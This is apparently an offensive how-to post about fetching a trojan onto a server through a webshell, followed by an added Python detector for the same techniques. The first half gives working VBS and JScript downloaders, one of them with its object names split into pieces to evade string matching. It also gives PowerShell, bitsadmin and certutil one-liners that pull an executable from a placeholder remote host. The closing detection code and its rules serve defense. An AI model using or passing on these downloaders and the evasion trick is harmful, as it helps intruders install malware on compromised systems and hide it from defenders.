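Sometimes, when working through a webshell, you find that you cannot upload a trojan. In that case, you can try using the shell to create a file with a .vbs extension,
and have the VBS script download the remote trojan. After the download, try running it through the webshell's command execution.
The code is as follows: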
————————————————————————-
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
Alternatively, create a new VBS script as follows:
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://xxx.xxx.xxx.xxx/1.exe"
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
wscript.sleep 3000
aGet.Write(post.responseBody)
aGet.SaveToFile "1.exe",2
Or download with PowerShell:
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xxx/1.exe','1.exe')"
Or use bitsadmin.exe:
bitsadmin.exe /transfer "test" http://xxx.xxx.xxx.xxx/1.exe C:\1.exe
Or use certutil:
certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/1.exe 1.exe
Or download with JS:
var objArgs=WScript.Arguments;
var sGet=new ActiveXObject("ADODB.Stream");
var xGet=null;
try{
    xGet=new XMLHttpRequest();
}catch(e){
    try{
        xGet=new ActiveXObject("Msxml2.XMLHTTP");
    }catch(ex){
        try{
            xGet=new ActiveXObject("Microsoft.XMLHTTP");
        }catch(e3){
            xGet=null;
        }
    }
}
if(xGet != null){
    xGet.Open("GET","http://xxx.xxx.xxx.xxx/1.exe",0);
    xGet.Send();
    sGet.Mode=3;
    sGet.Type=1;
    sGet.Open();
    sGet.Write(xGet.ResponseBody);
    sGet.SaveToFile("1.exe",2);
}
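
For defenders, every method above leaves a recognizable process command line or script body. The following is an added example, not part of the original post: a Python sketch that flags these command lines and undoes the string-splitting the first script uses to hide its ProgIDs. The rule names and sample inputs are constructed for illustration, and it assumes command lines are already collected from process-creation logging.

```python
import re

# Command-line patterns for the download methods listed above.
CMDLINE_RULES = {
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I),
    "powershell_webclient": re.compile(r"\bpowershell(\.exe)?\b.*net\.webclient.*downloadfile", re.I),
    "script_host_with_url": re.compile(r"\b[cw]script(\.exe)?\b.*\.(vbs|js)\b.*https?://", re.I),
}

# Adjacent string literals joined by + or &:  "Mi"+"cro"  ->  "Micro"
_CONCAT = re.compile(r'"\s*[+&]\s*"')

def normalize_script(text):
    """Undo literal concatenation used to hide ProgIDs from plain string matching."""
    return _CONCAT.sub("", text).lower()

def scan_script(text):
    """True if the script pairs an HTTP client object with ADODB.Stream.SaveToFile."""
    t = normalize_script(text)
    has_http = re.search(r"(microsoft|msxml2)\.(server)?xmlhttp|xmlhttprequest", t)
    return bool(has_http and "adodb.stream" in t and "savetofile" in t)

def scan_cmdline(cmdline):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]

# Constructed samples: the first script's obfuscated lines and the page's
# placeholder commands, plus one benign certutil call for contrast.
SAMPLE_VBS = r'''
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
'''
SAMPLE_CMDLINES = [
    r"cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe",
    r'bitsadmin.exe /transfer "test" http://xxx.xxx.xxx.xxx/1.exe C:\1.exe',
    r"certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/1.exe 1.exe",
    r"certutil -hashfile C:\1.exe SHA256",
]

if __name__ == "__main__":
    print("script flagged:", scan_script(SAMPLE_VBS))
    for line in SAMPLE_CMDLINES:
        print(scan_cmdline(line) or ["no match"], line)
```

A plain substring search for "adodb.stream" misses the first script because the name is split across literals; the normalization step is what makes the content rule fire.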